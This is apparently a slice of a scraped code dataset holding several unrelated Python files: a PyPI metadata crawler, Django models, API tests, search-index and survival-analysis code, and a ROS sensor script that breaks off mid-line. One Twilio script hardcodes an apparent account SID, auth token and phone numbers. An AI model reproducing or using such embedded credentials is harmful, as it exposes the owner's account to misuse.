INTO deps (\n package_name,\n dep_name,\n dep_specifier\n ) VALUES (?, ?, ?);\n \"\"\",\n (package, req_no_specifiers, specifier),\n )\n\n requires_dist[\"dists\"] = sorted(set(requires_dist[\"dists\"]))\n for extra, extra_info in 
list(requires_extras.items()):\n requires_extras[extra][\"dists\"] = sorted(set(extra_info[\"dists\"]))\n\n for relv, dls in resp[\"releases\"].items():\n for download in dls:\n if download[\"yanked\"]:\n yanked.append(relv)\n break\n\n yanked = sorted_versions(set(yanked))\n if yanked:\n db.execute(\n \"UPDATE packages SET yanked=1 WHERE name=? AND version=?;\",\n (package, str_version),\n )\n\n for check_name, check_score in scorecard_checks.items():\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO scorecard_checks (\n package_name,\n name,\n score\n ) VALUES (?, ?, ?);\n \"\"\",\n (package, check_name, check_score),\n )\n\n return package\n\n\ndef filter_packages(pkgs):\n # Check to see if we already have this package or not.\n packages_to_process = []\n with locked_db() as db:\n with closing(db.cursor()) as cur:\n for pkg in pkgs:\n cur.execute(\n \"SELECT name FROM packages WHERE name = ? LIMIT 1;\",\n (pkg,),\n )\n if cur.fetchone():\n continue\n packages_to_process.append(pkg)\n return packages_to_process\n\n\ndef parse_project_url(url):\n try:\n parsed = parse_url(url)\n if not parsed.host or parsed.host == \"pypi.org\":\n return None\n if not str(parsed).startswith(\"http\"):\n return None\n return parsed\n except Exception:\n return None\n\n\ndef update_data_from_pypi():\n filtered = filter_packages(packages)\n results = pool.map(update_data_for_package, filtered)\n for _ in tqdm(results, total=len(filtered), unit=\"packages\"):\n pass\n\n\ndef get_google_assured_oss_packages(http: urllib3.PoolManager) -> set[str]:\n resp = http.request(\"GET\", \"https://cloud.google.com/assured-open-source-software/docs/supported-packages\")\n data = resp.data.decode(\"utf-8\")\n\n # Start after the Python heading, then look for first list.\n data = data[data.find(\"<h2 id=\\\"python\\\"\") :]\n start = data.find(\"<ul>\")\n end = data.find(\"</ul>\")\n return {x.lower() for x in re.findall(r\"<li>([^<]+)</li>\", data[start:end])}\n\n\nif __name__ == \"__main__\":\n base_dir = os.path.dirname((os.path.abspath(__file__)))\n http = urllib3.PoolManager(\n block=True,\n strict=True,\n maxsize=MAX_WORKERS,\n headers=urllib3.util.make_headers(\n keep_alive=True,\n accept_encoding=True,\n user_agent=\"sethmlarson/pypi-data\",\n ),\n retries=urllib3.util.Retry(\n status=10, backoff_factor=0.5, status_forcelist=list(range(500, 600))\n ),\n )\n wheel_re = re.compile(r\"-([^\\-]+-[^\\-]+-[^\\-]+)\\.whl$\")\n\n GOOGLE_ASSURED_OSS_PACKAGES = get_google_assured_oss_packages(http)\n\n tmp_dir = tempfile.mkdtemp()\n os.system(f\"virtualenv {tmp_dir}/venv > /dev/null\")\n venv_python = os.path.join(tmp_dir, \"venv/bin/python\")\n\n pypi_deps_db = os.path.join(base_dir, \"pypi.db\")\n\n downloads = {}\n resp = http.request(\"GET\", DOWNLOADS_URL)\n assert resp.status == 200\n for row in json.loads(resp.data.decode(\"utf-8\"))[\"rows\"]:\n downloads[row[\"project\"]] = row[\"download_count\"]\n\n _DB = sqlite3.connect(os.path.join(base_dir, \"pypi.db\"), check_same_thread=False)\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS packages (\n name TEXT,\n version TEXT,\n requires_python TEXT,\n yanked BOOLEAN DEFAULT 0,\n has_binary_wheel BOOLEAN,\n has_vulnerabilities BOOLEAN,\n first_uploaded_at TIMESTAMP,\n last_uploaded_at TIMESTAMP,\n recorded_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n downloads INTEGER,\n scorecard_overall FLOAT,\n in_google_assured_oss BOOLEAN,\n PRIMARY KEY (name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS deps (\n package_name TEXT,\n version TEXT,\n dep_name TEXT,\n dep_specifier TEXT,\n extra TEXT DEFAULT NULL,\n PRIMARY KEY (package_name, version, dep_name, dep_specifier),\n FOREIGN KEY (package_name) REFERENCES packages(name),\n FOREIGN KEY (dep_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS wheels (\n package_name TEXT,\n version TEXT,\n filename TEXT,\n build TEXT,\n python TEXT,\n abi TEXT,\n platform TEXT,\n uploaded_at TIMESTAMP,\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS maintainers (\n name TEXT,\n package_name TEXT,\n PRIMARY KEY (name, package_name),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS package_urls (\n package_name TEXT,\n name TEXT,\n url TEXT,\n public_suffix TEXT,\n PRIMARY KEY (package_name, url),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS scorecard_checks (\n package_name TEXT,\n name TEXT,\n score INTEGER,\n PRIMARY KEY (package_name, name),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE INDEX IF NOT EXISTS idx_packages_name ON packages (name);\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE INDEX IF NOT EXISTS idx_packages_urls_public_suffix ON package_urls (public_suffix);\n \"\"\"\n )\n _DB.commit()\n db_lock = threading.Lock()\n pool = ThreadPoolExecutor(max_workers=MAX_WORKERS)\n\n packages = get_all_package_names()\n\n update_data_from_pypi()\n","repo_name":"sethmlarson/pypi-data","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17342,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"40"} +{"seq_id":"11437116963","text":"from django.db import models\r\nfrom accounts.models import Profile\r\nfrom doctors.models import 
Doctor\r\nfrom volunteers.models import Volunteer\r\n\r\n\r\n# via doctor\r\nclass Radiology(models.Model):\r\n x_ray = models.ImageField(null=True, blank=True, default=None)\r\n\r\n def get_xray(self):\r\n return self.x_ray\r\n\r\n\r\nclass Patient(Profile, models.Model):\r\n doctorp = models.ForeignKey(\r\n Doctor, on_delete=models.PROTECT, related_name='doctor_patient')\r\n # via doctor assign one V one to many\r\n volunteerp = models.ForeignKey(\r\n Volunteer, on_delete=models.PROTECT, default=None, null=True, blank=True)\r\n\r\n carername = models.CharField(max_length=25)\r\n carerphonenumber = models.CharField(max_length=12)\r\n careremail = models.EmailField()\r\n x_ray = models.ForeignKey(Radiology, on_delete=models.CASCADE, null=True, blank=True, default=None)\r\n","repo_name":"DevMed22/Revive_My_Memory","sub_path":"backend/patients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3941238280","text":"__copyright__ = \"Copyright 2019 - 2021 Richard Kemp\"\n__revision__ = \"$Id: 8dafaefe7c4f1ccca73df23d660c22a8ea2caed1 $\"\n\nfrom datetime import datetime\n\nfrom mercury import Timeframe, Timeseries\n\nfrom mercury.extras.datasources.alphavantage import Datasource\n\nfrom pandas import DataFrame\n\nimport pytest\n\n# API_KEY = os.environ['ALPHAVANTAGE_API_KEY']\nAPI_KEY = 'TEST'\n\n\n@pytest.fixture\ndef datasource():\n return Datasource(API_KEY)\n\n\nclass TestInstanciation():\n def test_valid_key(self, datasource):\n assert datasource\n\n\nclass TestGetMethod():\n @pytest.mark.online\n def test_invalid_interval(self, datasource):\n with pytest.raises(ValueError) as error:\n assert datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2017, 12, 15, 23, 00, 00),\n instrument=\"MSFT\",\n timeframe=Timeframe.H4)\n message = str(error.value)\n assert message == \"H4 interval not supported\"\n\n @pytest.mark.online\n def test_intraday_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.M5\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_daily_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.D1\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_weekly_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.W1\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_monthly_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.MN\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 
00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n","repo_name":"materya/mercury","sub_path":"test/integration/test_datasource_alphavantage.py","file_name":"test_datasource_alphavantage.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22310578556","text":"from twilio.rest import TwilioRestClient\n\naccount = \"ACe1eb373d270917b737deaedb1ecda797\"\ntoken = \"c4909e963577d964791ef521a1195fb1\"\nprint(\"Setting up client\")\nclient = TwilioRestClient(account, token)\n\nprint(\"Trying to make a call\")\ncall = client.calls.create(to=\"447933144812\",\n from_=\"441163260756\",\n url=\"https://demo.twilio.com/welcome/voice/\")\nprint(call.sid)\n","repo_name":"CFGLondon/team-8","sub_path":"fitbit/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20211471873","text":"from collections import Counter\n\n\nclass Solution:\n def countAnagrams(self, s: str) -> int:\n mole, deno = 1, 1\n MOD = 10 ** 9 + 7\n for w in s.split():\n cnt = Counter()\n for i, c in enumerate(w):\n cnt[c] += 1\n mole = mole * (i + 1) % MOD\n deno = deno * cnt[c] % MOD\n return mole * pow(deno, -1, MOD) % MOD\n\n","repo_name":"Yescafe/leetcode-solutions","sub_path":"biweekly/094/6276.py","file_name":"6276.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"19320659616","text":"import os\nfrom io import BytesIO\n\nBLOCK_LEN = 102\n\n\nclass IndexReader:\n\n def __init__(self, dir):\n\n self.index_directory = dir\n\n # method that gets the pointer to the first word of the block in the dictionary's string and the pointer to the block itself,\n # returns a dictionary of all words in a block and their frequencies\n def get_block_words(self, index, pointer, strSize, curr_blk, blocks_amount):\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n next_block = pointer + BLOCK_LEN\n f.seek(next_block + 8)\n first_next_block_ptr_to_file = int.from_bytes(f.read(4),\n byteorder='big') # skip 4 of pointer to block in string + 4 of freq\n f.seek(next_block)\n str_next_block = int.from_bytes(f.read(4),\n byteorder='big') + 4 # get the pointer to the next block in string\n dict_freq = {}\n for i in range(10):\n if i == 0: # in case of first word in block\n pointer += 4 # skip the 4 bytes representing the length of the string\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big') # read the frequency\n pointer += 4\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big') # read the pointer in the encoded file\n pointer += 4\n word_length = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n index += 4\n f.seek(index)\n word = f.read(word_length).decode('ascii')\n index += word_length\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file) # save the pointer in the encoded file\n prev_word = word # save as previous word\n elif i < 9: # words 2-9 in the block\n if curr_blk == blocks_amount: # in case this is the last block\n f.seek(pointer + 9)\n check = int.from_bytes(f.read(4), byteorder='big') # check if there are more words in the block\n if check == 0: # in case not, skip\n continue\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big')\n 
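# after the 4-byte frequency come the postings-file offset (4 bytes), the word length (1 byte) and the shared-prefix length (1 byte)\n 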
pointer += 4\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n length = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n prefix = int.from_bytes(f.read(1), byteorder='big') # read the prefix\n pointer += 1\n word = prev_word[:prefix] # get the common characters from the previous word\n to_read = length - prefix\n f.seek(index)\n word += f.read(to_read).decode('ascii') # read the non-common and decode\n dict_freq[prev_word].append(ptr_to_file) # save the freq of the previous word\n prev_word = word\n index += to_read\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file) # save the id of the review\n else: # in case this is the last word on block\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n if curr_blk == blocks_amount: # in case this is the last block\n length = strSize - index\n else:\n length = str_next_block - index\n\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n prefix = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n word = prev_word[:prefix]\n to_read = length\n f.seek(index)\n word += f.read(to_read).decode('ascii')\n dict_freq[prev_word].append(ptr_to_file)\n prev_word = word\n index += to_read\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file)\n if first_next_block_ptr_to_file != 0: # in casse there are more blocks\n dict_freq[word].append(first_next_block_ptr_to_file)\n else:\n file_size = os.path.getsize(self.index_directory + \"/text.pl\")\n dict_freq[word].append(file_size)\n\n return dict_freq\n\n def decode(self, stream): # decode bytes to int\n\n move = 0\n result = 0\n while True:\n i = self.read_one_byte(stream)\n result |= (i & 0x7f) << move\n move += 7\n if not (i & 0x80):\n break\n\n return result\n\n def decodeFromBytes(self, buf): # decode all bytes to one int\n\n return self.decode(BytesIO(buf))\n\n def read_one_byte(self, stream):\n\n c = stream.read(1)\n if c == b'':\n raise EOFError(\"Unexpected EOF while reading bytes\")\n return ord(c)\n\n def getTokenFrequency(self, token): # get frequency of the given word\n\n file_size = os.path.getsize(self.index_directory + \"/text.dic\")\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n string_size = int.from_bytes(f.read(4), byteorder='big')\n blocks_num = (file_size - string_size - 4) // BLOCK_LEN # calculate the amount of blocks\n first_block_ptr = 4 + string_size # skip the first 4 bytes represent the length of the string\n\n right = blocks_num # last block\n left = 0\n\n while left <= right: # binary search in blocks\n curr_block = ((left + right) // 2)\n mid = ((\n left + right) // 2) * BLOCK_LEN + first_block_ptr # pointer of the middle block in the dictionary\n f.seek(mid)\n middle_ptr = int.from_bytes(f.read(4), byteorder='big') # pointer to the middle block in the string\n dict_words_in_block = self.get_block_words(middle_ptr, mid, string_size + 4, curr_block,\n blocks_num - 1) # get dictionary of the words in the block\n if token in dict_words_in_block:\n return dict_words_in_block[token][0]\n if token > list(dict_words_in_block.keys())[\n 0]: # compare it to the first word in the block (alphabetically)\n left = (left + right) // 2 + 1\n else:\n right = (left + right) // 2 - 1\n\n return 0\n\n def getNumberOfReviews(self): # get the amount of reviews in the file\n\n with open(self.index_directory + \"/reviews_and_words.txt\", \"r\") as f:\n lines = f.readlines()\n return lines[0]\n\n def getTokenSizeOfReviews(self): #\n\n with open(self.index_directory 
+ \"/reviews_and_words.txt\", \"r\") as f:\n lines = f.readlines()\n return lines[1]\n\n def getReviewsWithToken(self, token): # get the amount of reviews contain that token\n\n file_size = os.path.getsize(self.index_directory + \"/text.dic\")\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n string_size = int.from_bytes(f.read(4), byteorder='big')\n blocks_num = (file_size - string_size - 4) // BLOCK_LEN # calculate the amount of blocks\n first_block_ptr = 4 + string_size # skip the first 4 bytes represent the length of the string\n\n right = blocks_num # last block\n left = 0\n\n reviews = list()\n while left <= right: # binary search in blocks\n curr_block = ((left + right) // 2)\n mid = ((\n left + right) // 2) * BLOCK_LEN + first_block_ptr # pointer of the middle block in the dictionary\n f.seek(mid)\n middle_ptr = int.from_bytes(f.read(4), byteorder='big') # pointer to the middle block in the string\n dict_ptr_to_file = self.get_block_words(middle_ptr, mid, string_size + 4, curr_block,\n blocks_num - 1) # get dictionary of the words in the block\n if token in dict_ptr_to_file:\n file_ptr = dict_ptr_to_file[token][1] # get the id of the review\n toRead = dict_ptr_to_file[token][2] - file_ptr # get the length by calculating the next pointer\n with open(self.index_directory + \"/text.pl\", \"rb\") as file:\n file.seek(file_ptr)\n byte_count = 0\n while byte_count < toRead:\n coded = file.read(1)\n byte_count += 1\n copy = coded\n decoded = int.from_bytes(coded, byteorder='big')\n while (\n decoded & 0x80 == 0x80) and byte_count < toRead: # in case the byte starts with '1', more bytes to read\n coded = file.read(1)\n copy += coded\n byte_count += 1\n decoded = int.from_bytes(coded, byteorder='big')\n\n reviews.append(self.decodeFromBytes(copy)) # save the review's id\n for i in range(len(reviews)):\n if i > 1 and i % 2 == 0: # calculate the pointers from the differences from each other\n reviews[i] += reviews[i - 2]\n\n return tuple(reviews)\n if token > list(dict_ptr_to_file.keys())[\n 0]: # compare it to the first word in the block (alphabetically)\n left = (left + right) // 2 + 1\n else:\n right = (left + right) // 2 - 1\n\n return tuple(reviews)\n\n def getTokenCollectionFrequency(self, token): # return the amount of times the token shows in all the reviews\n\n total_freq = 0\n list_of_token = self.getReviewsWithToken(token)\n for i in range(len(list_of_token)): # go over all the reviews of the given token\n if i % 2 != 0: # odd places holds the frequences\n total_freq += list_of_token[i] # sum\n\n return total_freq\n","repo_name":"DanielYona1/Projects","sub_path":"Information-Retrieval/IndexReader.py","file_name":"IndexReader.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21424992746","text":"from random import randint\ncont = 0\nprint('Sou seu computador...\\nAcabei de pensar em número de 0 a 10.\\nConsegue adivinha-lo??')\npc: int = randint(0, 10) #randint não ignora o ultimo valor\nacertou = False\nwhile not acertou:\n j = int(input('Qual é o seu palpite? '))\n cont = cont + 1\n if j == pc:\n acertou = True\n else:\n if j > pc:\n print('MENOS! Tente novamente.')\n else:\n print('MAIS! Tente novamente.')\n print('='*25)\nif cont == 0:\n print('WOW! Acertou de primeira! Parabéns!')\nelif cont == 1:\n print('Acertou! Foram somente {} tentativas para acertar.'.format(cont))\nelse:\n print('Finalmente acertou! 
Foram {} tentativas para acertar.'.format(cont))\n","repo_name":"gabrielraeder/Python","sub_path":"Scripts PYTHON/PycharmProjects/pythonExercicios/Mundo 02/Aula14/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34062427135","text":"import csv\r\nimport numpy\r\nimport random\r\nfrom sksurv.linear_model import CoxnetSurvivalAnalysis\r\nfrom sksurv.nonparametric import kaplan_meier_estimator\r\nfrom sksurv.linear_model import CoxPHSurvivalAnalysis\r\nfrom sksurv.metrics import concordance_index_censored\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt;\r\n\r\n\r\n# converts cells to floats, empty cells become 0\r\ndef convertToFloat(x):\r\n if x == '' or x == '-':\r\n return 0\r\n else:\r\n return float(x)\r\n\r\ndef split_for_kaplan(labels, vars, id):\r\n event = [[],[]];\r\n time = [[],[]];\r\n for i in range(0, len(labels)):\r\n event[int(vars[i][id])].append(labels[i][0])\r\n time[int(vars[i][id])].append(labels[i][1])\r\n return (event, time);\r\n\r\n# open data\r\nf = open('base_diabete_lasso.csv', 'r')\r\n# create reader\r\nreader = csv.reader(f, delimiter=';')\r\n# skip the first line because it has only labels\r\nheader = next(reader)\r\n\r\n# create a list for all features\r\ndata = []\r\n# create a list for labels (got sick or not)\r\nlabel = []\r\n\r\n# for every row in the data\r\nfor row in reader:\r\n # convert every feature cell\r\n data.append(numpy.array(list(map(convertToFloat, row[2:len(row)]))))\r\n # get the label and add it to the label list\r\n label.append(('1' == row[0], convertToFloat(row[1])))\r\n\r\n# transform label data to required format\r\n\r\nd = list(zip(data, label));\r\n\r\ndiabetic = []\r\nnon_diabetic = []\r\n\r\nfor val in d:\r\n if(val[0][0]):\r\n diabetic.append(val);\r\n else:\r\n non_diabetic.append(val);\r\n \r\n\r\n# shuffle data\r\nrandom.shuffle(diabetic);\r\nrandom.shuffle(non_diabetic);\r\n\r\n# split data and labels\r\ntrain_data = diabetic[0:int(0.66 * len(diabetic))] + non_diabetic[0:int(0.66 * len(non_diabetic))];\r\ntest_data = diabetic[int(0.66 * len(diabetic)) : len(diabetic)] + non_diabetic[int(0.66 * len(non_diabetic)) : len(non_diabetic)];\r\n\r\n_train_d, _train_l = zip(*train_data);\r\n_test_d, _test_l = zip(*test_data);\r\n\r\n_train_d = list(_train_d)\r\n_test_d = list(_test_d)\r\n\r\n# plot some lame estimator stuff\r\n_event, _time = split_for_kaplan(_train_l, _train_d, 2)\r\n\r\nfor i in range(0, len(_event)):\r\n x, y = kaplan_meier_estimator(_event[i], _time[i])\r\n plt.step(x, y, where=\"post\", label=str(i));\r\n\r\nplt.legend();\r\n\r\nplt.plot();\r\n\r\n_train_l = numpy.array(list(_train_l), dtype='bool,f4');\r\n\r\n_test_l = numpy.array(list(_test_l), dtype='bool,f4');\r\n\r\n# create ph model\r\nestimator = CoxPHSurvivalAnalysis();\r\n\r\nestimator.fit(_train_d, _train_l)\r\n\r\n# create the cox model\r\nclf = CoxnetSurvivalAnalysis(n_alphas=5, tol=0.1)\r\n\r\n# train model \r\nclf.fit(_train_d, _train_l);\r\n\r\nresult = [];\r\n# evaluate for every alpha\r\nfor v in clf.alphas_:\r\n res = clf.predict(_test_d, alpha=[v])\r\n result.append(concordance_index_censored(_test_l[\"f0\"], _test_l[\"f1\"], res))\r\n\r\n\r\n\r\n# calculate precision\r\nclf.predict(_test_d);\r\nres= clf.predict(_test_d);\r\n\r\n\r\n# print out some results\r\nprint(clf.coef_)\r\nprint(res)\r\n# save coefficients\r\n\r\n#numpy.savetxt(\"coefsWithLabels.txt\", list(map(lambda x : 
[str(x[0]),str(x[1])], zip(clf.coef_, header[2:len(header)]))), fmt=\"%s\")\r\n#numpy.savetxt(\"res.txt\", list(map(lambda x : [str(x[0]),str(x[1])], zip(clf.predict(test_data), header[2:len(header)]))), fmt=\"%s\")\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"holgus103/SurvivalAnalysis","sub_path":"testmodel.py","file_name":"testmodel.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42762739935","text":"import numpy\nimport copy\n\nclass ChromosomeLocationBitArrays( object ):\n\n def __init__( self, dicts=None, fname=None ):\n # If dicts parameter provided, use to initialize\n if dicts is not None:\n arrays = dicts\n else:\n arrays = {}\n sizes={}\n \n \n # If fname parameter provided, initialize from file\n if fname is not None: \n for line in open( fname ):\n fields = line.split()\n name = fields[0]\n size = int( fields[1] )\n arrays[name] = numpy.zeros( size, dtype=bool )\n self.arrays = arrays\n\n\n def set_bits_from_file( self, fname ):\n for line in open( fname ):\n fields = line.split()\n # Parse fields\n chrom = fields[0]\n start = int( fields[1] )\n end = int( fields[2] )\n self.arrays[ chrom ][ start : end ] = 1\n \n \n \n def Chrom_Start_End( self, fname ):\n map=[]\n \n for line in open( fname ):\n fields = line.split()\n # Parse fields\n chrom = fields[0]\n start = int( fields[1] )\n end = int( fields[2] )\n map.append([ chrom, start, end ])\n \n self.map=map\n #return map\n \n \n \n \n \n#__________________________________________________________________ \n def compare(self,A, B, C):\n comp=[0,0,0,0,0,0,0] # (A,B,AB,C,AC,BC,ABC)\n \n\n\n\n for line in range (0, len(A.map)):\n chromosome=A.map[line][0]\n start=A.map[line][1]\n end=A.map[line][2]\n\n slB=B.arrays[chromosome][start:end]\n slC=C.arrays[chromosome][start:end]\n\n if slB.any()==False and slC.any()==False:\n comp[0]+=1\n\n if slB.any()==True and slC.any()==True:\n comp[6]+=1\n\n if slB.any()==True and slC.any()==False:\n comp[2]+=1\n\n if slB.any()==False and slC.any()==True:\n comp[4]+=1\n \n \n \n \n for line in range (0, len(B.map)):\n chromosome=B.map[line][0]\n start=B.map[line][1]\n end=B.map[line][2]\n\n slA=A.arrays[chromosome][start:end]\n slC=C.arrays[chromosome][start:end]\n\n if slA.any()==False and slC.any()==False:\n comp[1]+=1\n\n if slA.any()==True and slC.any()==True:\n comp[6]+=1\n\n if slA.any()==True and slC.any()==False:\n comp[2]+=1\n\n if slA.any()==False and slC.any()==True:\n comp[5]+=1\n \n \n for line in range (0, len(C.map)):\n chromosome=C.map[line][0]\n start=C.map[line][1]\n end=C.map[line][2]\n\n slB=B.arrays[chromosome][start:end]\n slA=A.arrays[chromosome][start:end]\n\n if slB.any()==False and slA.any()==False:\n comp[3]+=1\n\n if slB.any()==True and slA.any()==True:\n comp[6]+=1\n\n if slB.any()==True and slA.any()==False:\n comp[5]+=1\n\n if slB.any()==False and slA.any()==True:\n comp[4]+=1\n\n\n return comp\n \n\n\n \n\n#__________________________________________________________________ \n\n\n \n \n def intersect( self, other ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = self.arrays[chrom] & other.arrays[chrom]\n return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n def union( self, other ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = self.arrays[chrom] | other.arrays[chrom]\n return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n \n def complement( self ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = ~ self.arrays[chrom]\n 
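# numpy's ~ on a bool array flips every element, i.e. the set complement of the marked positions\n 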
return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n \n def copy( self ):\n return ChromosomeLocationBitArrays( \n dicts=copy.deepcopy( self.arrays ) )\n \n \n \n \n ","repo_name":"ursky/qbb2015-homework","sub_path":"day4/homework/chrombits.py","file_name":"chrombits.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22683953164","text":"import argparse\nimport numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(\n description=\"Decision Tree Regressor.\"\n)\nparser.add_argument(\n 'filename', type=str, help='Filename with numeric data stored in tuples (x, y).'\n)\n\n\ndef find_parameters(X: np.ndarray, y: np.ndarray) -> tuple:\n dec_tree_regression = DecisionTreeRegressor(max_depth=1, max_leaf_nodes=2, criterion='squared_error')\n dec_tree_regression.fit(X, y)\n\n X_test = np.arange(0.0, 5.0, 0.01)[:, np.newaxis]\n y_1 = dec_tree_regression.predict(X_test)\n\n c = dec_tree_regression.tree_.threshold[0]\n a = dec_tree_regression.tree_.value[1][0]\n b = dec_tree_regression.tree_.value[2][0]\n\n text_representation = tree.export_text(dec_tree_regression, feature_names=['x'])\n print(text_representation)\n\n plt.figure()\n plt.scatter(X, y, s=20, edgecolor=\"black\", c=\"blue\", label=\"data\")\n plt.plot(X_test, y_1, color=\"red\", linewidth=2)\n plt.xlabel(\"data\")\n plt.ylabel(\"target\")\n plt.title(\"Дерево решений в применении к регрессии\")\n plt.savefig('plot.png')\n\n return c, a, b\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n filename = args.filename\n\n X = list()\n y = list()\n\n with open(filename, 'r') as file:\n for line in file:\n line = line.split(',')\n X.append(float(line[0]))\n y.append(float(line[1]))\n\n X = np.array(X).reshape(-1, 1)\n y = np.array(y).ravel()\n\n c, a, b = find_parameters(X, y)\n\n print(f'c = {c}, a = {a[0]}, b = {b[0]}')\n","repo_name":"crazy-historian/go_ahead_test_task","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34802083140","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Float32MultiArray, String, Int16\nimport os\nimport pigpio\n\n#define the pin of RPi\ntouch_l_pin = 5\ntouch_b_pin = 12\ntouch_r_pin = 13\nlight_pin_d = 19\nlight_pin_a = 26 #can't read \n\n#define threshold value of light sensor\nthreshold = 20\n#initialize pinmode of rpi and give it a check\npi = pigpio.pi()\nif not pi.connected:\n exit()\n\npi.set_mode(touch_r_pin, pigpio.OUTPUT)\npi.set_mode(touch_l_pin, pigpio.OUTPUT)\npi.set_mode(touch_b_pin, pigpio.OUTPUT)\npi.set_mode(light_pin_d, pigpio.INPUT)\npi.set_mode(light_pin_a, pigpio.INPUT)\n\nrospy.init_node('sensor', anonymous=True) #node \npub_touch_sensor = rospy.Publisher('touch_sensor', Float32MultiArray, queue_size=10) #topic name\npub_light = rospy.Publisher('light_sensor', Int16, queue_size=10) #topic name\n#pub_state = rospy.Publisher('car_state', String, 